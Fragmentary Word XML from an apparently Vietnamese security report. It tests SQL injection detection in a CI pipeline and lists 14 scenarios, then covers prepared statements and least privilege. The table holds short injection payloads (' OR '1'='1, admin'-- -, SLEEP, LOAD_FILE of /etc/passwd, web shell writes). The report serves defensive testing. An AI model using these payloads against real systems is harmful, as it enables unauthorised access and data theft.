                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> và phân tích luồng dữ liệu)</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(Phân loại </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>vuln_category="sqli"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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HTTP 200 / HTTP 500</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V2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1578"/>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GET /ports/{code}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Trích xuất dữ liệu qua lỗi XPath</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(Hạ điểm bảo mật xuống mức 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từ khóa </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>extractvalue</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> và lỗi cú pháp)</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HTTP 200 / HTTP 500</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V3</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POST /login</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Vượt qua xác thực đăng nhập (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>' OR '1'='1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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(Phát hiện điểm yếu CWE-89)</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chuỗi </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>or 1=1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> và </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>admin'-- -</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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HTTP 302 Redirect</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V4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1578"/>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GET /api/track</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Suy diễn dữ liệu bằng độ trễ thời gian (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SLEEP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</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(Truy vết luồng dữ liệu độc hại)</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hàm </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sleep(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> và thời gian trễ $\ge 5$s)</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HTTP 200 (Trễ $\ge 5000$ms)</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V5</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GET /account?order=</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Chèn mã vào mệnh đề sắp xếp Order-By</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(Tập luật địa phương </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>taint-order-by</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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biểu thức logic trong tham số)</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HTTP 200 (Rò rỉ khóa API)</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V6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1578"/>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POST /account/update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Chèn mã vào câu lệnh cập nhật dữ liệu</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(Mẫu vi phạm CWE-89)</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payload sửa đổi dữ liệu trái phép)</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HTTP 302 / HTTP 200</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V7</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GET /shipments/{id}</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Tiêm lệnh SQL trên tham số dạng số</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(Truy vết luồng dữ liệu độc hại)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UNION trên tham số định danh)</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HTTP 200 / HTTP 500</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V8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1578"/>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POST /comments</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Chèn mã vào câu lệnh thêm mới INSERT</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(Mẫu vi phạm CWE-89)</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(Ghi nhận nỗ lực chèn dữ liệu ô nhiễm)</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HTTP 302 Redirect</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V9</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POST /comments/del</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Chèn mã vào câu lệnh xóa dữ liệu DELETE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(Truy vết luồng dữ liệu độc hại)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payload xóa dữ liệu ngoài phạm vi)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HTTP 302 Redirect</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V10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1578"/>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GET /admin</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Dò quét tài khoản khách hàng ẩn danh</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(Quy tắc </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>php:S2077</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</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payload trích xuất tài khoản khách hàng)</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HTTP 200</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V11</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POST /admin/export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Thực thi đa lệnh tạo bảng trái phép</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(Quy tắc cấm hàm </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ban-multi-query</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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câu lệnh tạo bảng tùy ý)</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HTTP 200</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V12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1578"/>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GET /admin/console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Chèn câu lệnh ghi tệp để tạo Web Shell</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(Quy tắc chặn hàm </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>mysqli_multi_query</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</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BÁO ĐỘNG ĐỎ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Phát hiện ghi tệp và gọi lệnh hệ thống)</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HTTP 200 (Thực thi lệnh </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</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V13</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GET /reports/down</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Đọc tệp tin hệ thống bằng </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>LOAD_FILE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(Quy tắc cấm hàm đọc file)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nỗ lực đọc tệp </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/etc/passwd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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HTTP 200 / HTTP 500</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V14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1578"/>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GET /news?id=</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Ghép bảng đọc dữ liệu bằng tham số tin tức</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(Quy tắc </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>php:S2077</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</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payload UNION đọc bảng người dùng)</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HTTP 200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Đánh giá hiệu quả tổng thể:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Kết quả thực nghiệm trên 14 kịch bản cho thấy sức mạnh của mô hình phòng thủ nhiều lớp: Nếu một lỗ hổng vô tình lọt qua khâu tự kiểm tra của lập trình viên, giai đoạn quét mã nguồn tự động ở Stage 2 (kết hợp giữa bộ đo chất lượng nghiêm ngặt của SonarQube và khả năng dò luồng dữ liệu độc hại của Semgrep) sẽ phát hiện và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>chặn đứng toàn bộ 14/14 nguy cơ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ngay tại thời điểm mở Pull Request vào nhánh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>, tuyệt đối không cho phép mã lỗi lọt vào nhánh tích hợp. Đồng thời, đối với hệ thống đang vận hành trên máy chủ thực tế, cụm giám sát Promtail và Loki ghi nhận chính xác 100% các hành vi tấn công, tự động phân loại mức độ nguy hiểm và hiển thị trực quan địa chỉ IP, đường dẫn URL cùng nội dung truy vấn lên bảng điều khiển Grafana để người quản trị kịp thời xử lý.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>5.5. Biện pháp vá lỗi và phòng thủ an toàn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.5.1. Chống tấn công SQL Injection bằng cơ chế chuẩn bị trước câu lệnh truy vấn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Biện pháp phòng thủ căn bản và triệt để nhất đối với lỗi chèn câu lệnh SQL là tách rời hoàn toàn giữa cấu trúc lệnh truy vấn và dữ liệu người dùng nhập vào. Lập trình viên thay thế việc ghép chuỗi truyền thống bằng kỹ thuật Prepared Statements với PDO:</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pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="24292F"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>// Sửa chữa an toàn bằng câu lệnh chuẩn bị trước qua PDO</w:t>
              <w:br/>
              <w:t>$stmt = $pdo-&gt;prepare("SELECT id, code, city, country, volume FROM ports WHERE code LIKE :code");</w:t>
              <w:br/>
              <w:t>$stmt-&gt;execute(['code' =&gt; '%' . $_GET['q'] . '%']);</w:t>
              <w:br/>
              <w:t>$results = $stmt-&gt;fetchAll();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Khi sử dụng phương pháp này, máy chủ cơ sở dữ liệu sẽ biên dịch trước khung câu lệnh SQL. Tham số do người dùng nhập vào được truyền riêng biệt dưới dạng giá trị thuần túy chứ không bao giờ được phân tích cú pháp như một phần của lệnh SQL, triệt tiêu hoàn toàn khả năng bị bẻ gãy cú pháp câu truy vấn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.5.2. Phân quyền chặt chẽ trên thư mục và hạn chế quyền tài khoản cơ sở dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Phân quyền trên hệ thống tệp tin:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Toàn bộ cây thư mục mã nguồn ứng dụng web được thiết lập quyền chỉ đọc đối với tài khoản dịch vụ web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>www-data</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Ngoại trừ các thư mục bắt buộc phải ghi dữ liệu tạm thời (như thư mục tải tệp lên hoặc thư mục lưu phiên làm việc), tất cả các tệp PHP đều bị cấm quyền ghi để ngăn chặn việc kẻ tấn công tải lên hoặc chỉnh sửa mã nguồn trực tiếp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Máy chủ web Apache và Nginx được cấu hình cấm tuyệt đối việc thực thi các tệp PHP trong các thư mục lưu trữ tệp tải lên của người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Hạn chế đặc quyền trong cơ sở dữ liệu:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tài khoản kết nối của ứng dụng web chỉ được cấp các quyền thao tác dữ liệu tối thiểu cần thiết (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>INSERT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">) trên đúng cơ sở dữ liệu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight</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Tước bỏ hoàn toàn các quyền quản trị nhạy cảm như quyền </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>FILE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ngăn chặn việc đọc ghi tệp qua </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>LOAD_FILE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> hoặc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>INTO OUTFILE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">), quyền </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>GRANT OPTION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và quyền </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>DROP TABLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.5.3. Tự động phục hồi dịch vụ khi gặp sự cố bằng Autoheal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Để đảm bảo hệ thống luôn sẵn sàng phục vụ khi xảy ra sự cố đột ngột:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Chỉ thị </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>healthcheck</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>InlaneWeb/docker-compose.prod.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> liên tục gửi tín hiệu thăm dò tới endpoint nội bộ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
